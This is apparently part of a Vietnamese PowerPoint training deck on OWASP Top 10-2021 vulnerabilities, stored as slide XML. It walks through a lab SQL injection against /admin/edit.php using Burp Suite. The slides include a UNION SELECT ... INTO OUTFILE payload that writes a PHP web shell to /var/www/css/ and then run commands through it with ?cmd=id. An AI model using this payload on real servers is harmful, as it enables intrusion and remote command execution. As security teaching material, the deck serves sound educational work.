            <a:off x="114300" y="177823"/>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Trong Burp Suite chuyển sang tab Decode nhập đoạn mã cần decode, chọn encode as URL và ta sẽ có giá trị được encode.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BEC46CF-4A13-BDDB-A8A2-3131A4D5DBEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1801300"/>
            <a:ext cx="9118270" cy="2656399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="105377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FC2B9-07DD-F1A0-E36D-7090703D268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BDDC03A-3342-327A-932D-B1F68F4FBFED}"/>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AC09D360-FA73-A351-CD19-212BFC9DF980}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535940" y="295478"/>
            <a:ext cx="8455660" cy="2598147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>1.3.2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Phân</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>tích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>hổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>chính</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>trong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> OWASP Top 10-2021</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0F227BBE-C519-3D97-657F-55BC90C69C9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a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E146FE18-004D-33D4-0DC0-5E399640BA02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226541" y="1969322"/>
            <a:ext cx="4808357" cy="3336810"/>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A06:2021-Vulnerable and Outdated Components (Các thành phần dễ bị tổn thương và lỗi thời): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Sự phụ thuộc vào các thư viện bên thứ ba lỗi thời là điểm yếu nghiêm trọng.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7172" name="Picture 4" descr="OWASP Top 10 security vulnerabilities 2021 Evalian®">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A527C0A3-1AA4-E25F-EA8D-0EF9841B5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20294"/>
            <a:ext cx="3923030" cy="385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1371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5C2E3-6DF7-7CE9-379E-4596A2F9197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54F1EA7-30C5-0A7A-0678-6820C7AE129C}"/>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7A86DBAC-07DB-9C10-36C6-6E758FE2AB0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lang="en-US" spc="-25" smtClean="0"/>
              <a:t>210</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9CF6F27-1066-92ED-37BE-F9667EA1D5D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177823"/>
            <a:ext cx="8915400" cy="18081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2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Nhập giá trị vừa decode vào sau GET /admin/edit.php?  id=… , và đảm bảo PHPSESSID đang là cookie của phiên đăng nhập thành công.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="354965" indent="-342265">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="819"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC9900"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Kết quả cho thấy  Response đã trả về root@localhost.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40C05076-174B-672F-EC59-EC056A1CF0B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="331024" y="2062209"/>
            <a:ext cx="8481951" cy="3974270"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23095756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5AB5F-82D9-C03D-639F-1F83DA112ED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3371045-5699-F266-C8F8-E33A1CA35DB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E9E52CD-9C34-DFD7-4BD9-AC6181D1B183}"/>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211</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE05D559-C9C1-D4DF-31C3-2C252825114E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177823"/>
            <a:ext cx="8915400" cy="113107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Right-click </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>chọn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Show response in browser</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Dùng đường dẫn này truy cập vào browser.</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B7477A4D-5D3B-5E63-A061-72E89CA57EAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="288925" y="1353236"/>
            <a:ext cx="8566150" cy="4361764"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34221551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37CF-53E0-B977-61F0-34FD73EC0AE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8FE2D7C-3B78-A73E-583D-742599D8610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4152825-9BDA-2FC5-A5A7-B1CB3B02FA7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212</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55221672-FE18-9F90-6F84-E100F54AE710}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-55538" y="577863"/>
            <a:ext cx="9255075" cy="4559273"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2772376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EE0AC-4A0F-268C-82F5-D1209A82DCD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F811214-FA3D-8658-0D07-ECB9B3F7375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B4830D6-0214-06F2-C07D-D7D51055234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213</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2461EB0B-0170-A876-F740-86570A5F680F}"/>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Trước đó chúng ta đã phát hiện ra một đường dẫn khả nghi đó là /var/www/admin/edit.php online 15</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7128568B-02C7-3EA3-CCC0-467EE871C36D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="229068" y="1283502"/>
            <a:ext cx="8685863" cy="4240975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34212502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ACAC7-B199-1B19-F22E-9A5F584807E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2A31937-991C-7355-AE7F-D038898E9D6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3F173633-1EAC-2F8F-20DE-6D65F926F35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214</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE6B1AE2-8780-BC4E-54B0-1EB3610979C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177823"/>
            <a:ext cx="8915400" cy="4465324"/>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Mỗi trình duyệt thường sẽ có 1 folder css riêng. Ta có thể sử dụng folder này để upload 1 file độc hại cho phép thực thi lệnh cmd. Cụ thể nội dung ta có thể upload như sau:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="354965" indent="-342265">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="819"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC9900"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>0 UNION SELECT 1,2,'&lt;?php system($_GET["cmd"]);?&gt;',4 INTO OUTFILE '/var/www/css/webshell01.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>’</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Nội dung này sẽ upload file webshell2.php cho phép thực hiện các lệnh cmd vào folder var/www/css/ </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29566972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A10E7-7AAB-FC50-A292-252E135AA67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CF59D86-5C35-139F-2822-0EA8383B17B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7F982B75-E798-E027-D95B-5A32445FD90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215</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{889FF05E-52C9-5DB3-EBBD-DDAA733A33B1}"/>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Như trước đó ta vẫn mã hóa lệnh này qua tab Decode của Burp Suite</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81D7BCEA-83D4-3B40-12D6-746ACB71C675}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-28671" y="1496485"/>
            <a:ext cx="9159971" cy="2722030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12845693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17270-06CF-518D-ADAB-7165F3E88A9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4F86894-1058-F62F-353B-E7386C010F8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C9E1989-7E2A-85EF-2061-B230387E51D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216</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1957FB83-0D74-7838-4B83-AD066E9A8850}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177823"/>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Dán đoạn payload được encode vào thanh địa chỉ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FCE5977-AE51-BC65-1A8F-E5B8581714C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="77280" y="877970"/>
            <a:ext cx="8878380" cy="2219325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E497CD78-AEE5-64B4-4083-C2A4FDA2997C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="288925" y="2339463"/>
            <a:ext cx="8566150" cy="3273914"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40103364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8AFC7-353D-4CAC-43F7-5BAE42F822A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2DA40E7-2128-23B3-6196-CF2F1A395CB1}"/>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35FDCA6F-CCF2-24AB-3955-65963A22237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217</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{305C530F-ED19-6621-E60B-17388B39AE99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177823"/>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Sau khi load mã độc vừa rồi, website sẽ trả về giao diên như hình dưới. Dù báo lỗi nhưng file thực thi đã được thêm vào folder var/www/css/ </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56E91696-E642-7000-EAAF-3CCD33EEA94F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-19050" y="1866900"/>
            <a:ext cx="9128303" cy="2813663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37755108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37312-371A-085B-2E25-30EBDC69083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F5B69D6-6DD6-129F-E305-F63644CA9EE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12026C10-11BB-B224-2860-E7E5F28646B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218</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB31AF76-03DB-6D6B-E246-46D574035EBA}"/>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Kết </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>quả file webshell.php đã thành công thêm vào folder css của hệ thống.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACCDC772-9755-D454-D75C-40E1B8BD6C49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2386012" y="1660502"/>
            <a:ext cx="4371975" cy="3790950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22878458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9E025-5916-447F-B7A3-57046CBA1B4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67C80A7-14C8-E956-BC9E-9D0E01BF88B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0E950BA6-CA06-2D73-864E-80C2A6881B2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219</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A96B190E-5CC2-DCBB-CF3C-AE32D0F64DF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177823"/>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Sau khi upload file thực thi, ta có thể sử dụng đường dẫn này với tham số cmd làm lệnh. Cụ thể ở đây ta thực hiện với lệnh: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>http://192.168.164.132/css/webshell01.php?cmd=id</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD2330A4-66D7-4515-AA3D-60D76B15DAB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="29795" y="2362986"/>
            <a:ext cx="9084409" cy="2728823"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1922804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FC2B9-07DD-F1A0-E36D-7090703D268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BDDC03A-3342-327A-932D-B1F68F4FBFED}"/>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AC09D360-FA73-A351-CD19-212BFC9DF980}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535940" y="295478"/>
            <a:ext cx="8455660" cy="2598147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
